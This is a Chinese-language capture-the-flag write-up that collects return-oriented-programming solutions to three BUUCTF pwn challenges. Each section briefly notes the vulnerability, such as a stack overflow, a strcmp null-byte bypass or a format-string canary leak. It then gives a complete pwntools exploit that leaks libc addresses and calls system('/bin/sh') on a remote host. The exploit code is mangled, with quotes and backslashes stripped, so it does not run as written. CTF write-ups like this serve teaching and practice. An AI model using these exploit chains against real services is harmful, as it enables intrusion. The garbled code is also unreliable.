buuctf ---- ROP集合（未完）

buuctf ---------- babyrop1

NX栈不可执行开启

使用32位IDA查看程序

读取输入，进行字符串比较，不同则退出，相同则返回输入的第8个字节，可以通过输入 绕过字符串比较

a1可以是255，造成buf溢出。

编写exp

from pwn import *
from LibcSearcher import *
io=remote("node4.buuoj.cn",28966)
elf=ELF("pwn")

write_plt=elf.plt[write]
puts_got=elf.got[puts]
start=0x080485A0
main=0x08048825

payload="x00"+"xff"*(0x2c-0x25)
io.sendline(payload)
io.recvuntil("Correct
")
payload2=a*0xE7+a*4+p32(write_plt)+p32(start)+p32(1)+p32(puts_got)+p32(4)
io.send(payload2)
puts_got=u32(io.recv(4))


libc=LibcSearcher(puts,puts_got)
base=puts_got-libc.dump(puts)
system=base+libc.dump(system)
binsh=base+libc.dump(str_bin_sh)

payload="x00"+"xff"*(0x2c-0x25)


io.sendline(payload)
io.recvuntil("Correct
")
payload2=a*0xE7+a*4+p32(system)+p32(0)+p32(binsh)
io.sendline(payload2)
io.interactive()

buuctf ---------- babyrop2

使用64位的IDA查看

思路：buf只有0x20，却要读入0x100，会发生溢出。构造system（‘/bin/sh’），利用read函数，去泄露程序的libc基址，然后去获得system和/bin/sh字符串的地址。

编写exp

from pwn import *
from LibcSearcher import *
context.log_level = debug

io=remote(node4.buuoj.cn,29857)
elf = ELF(babyrop2)

pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
format_str = 0x0000000000400770
ret_addr = 0x0000000000400734

printf_plt = elf.plt[printf]
read_got = elf.got[read]
main_plt = elf.sym[main]

payload = a*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)

io.recvuntil("name? ")
io.sendline(payload)

read_addr = u64(io.recvuntil(x7f)[-6:].ljust(8, x00))
print hex(read_addr)

#利用libcsearcher库去查找匹配的libc版本
libc = LibcSearcher(read, read_addr)
#计算程序里的偏移量
libc_base = read_addr - libc.dump(read)

#计算程序里system和/bin/sh的地址
sys_addr = libc_base + libc.dump(system)
bin_sh = libc_base + libc.dump(str_bin_sh)

payload = a*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
io.sendline(payload)
io.interactive()

buuctf ---------- bjdctf_2020_babyrop2

存在canary保护。

使用64位IDA查看main函数

init函数调用put函数输出提示

gift函数有printf函数，可以通过格式化字符串漏洞泄漏canary的值。

而vuln函数存在栈溢出漏洞，通过栈溢出漏洞进行程序劫持

编写exp

from pwn import *
from LibcSearcher import *
context.log_level=debug

io=remote(node4.buuoj.cn,26126)

elf=ELF(./bjdctf_2020_babyrop2)
pop_rdi=0x00400993
puts_got=elf.got[puts]
puts_plt=elf.plt[puts]
vuln_addr=elf.symbols[vuln]

io.recvuntil("Ill give u some gift to help u!")
io.sendline(%7$p)
io.recvuntil(0x)
canary=int(io.recv(16),16)
print([+]canary: ,hex(canary))

payload=a*(0x20-0x8)+p64(canary)+b*0x8
payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.recvuntil(Pull up your sword and tell me u story!)
io.sendline(payload)
io.recv()

puts_addr=u64(io.recv(6).ljust(8,x00))
libc=LibcSearcher(puts,puts_addr)
libc_base=puts_addr-libc.dump(puts)
system_addr=libc_base+libc.dump(system)
bin_addr=libc_base+libc.dump(str_bin_sh)

io.recvuntil(Pull up your sword and tell me u story!)
payload=a*(0x20-0x8)+p64(canary)+b*0x8
payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
io.sendline(payload)

io.interactive()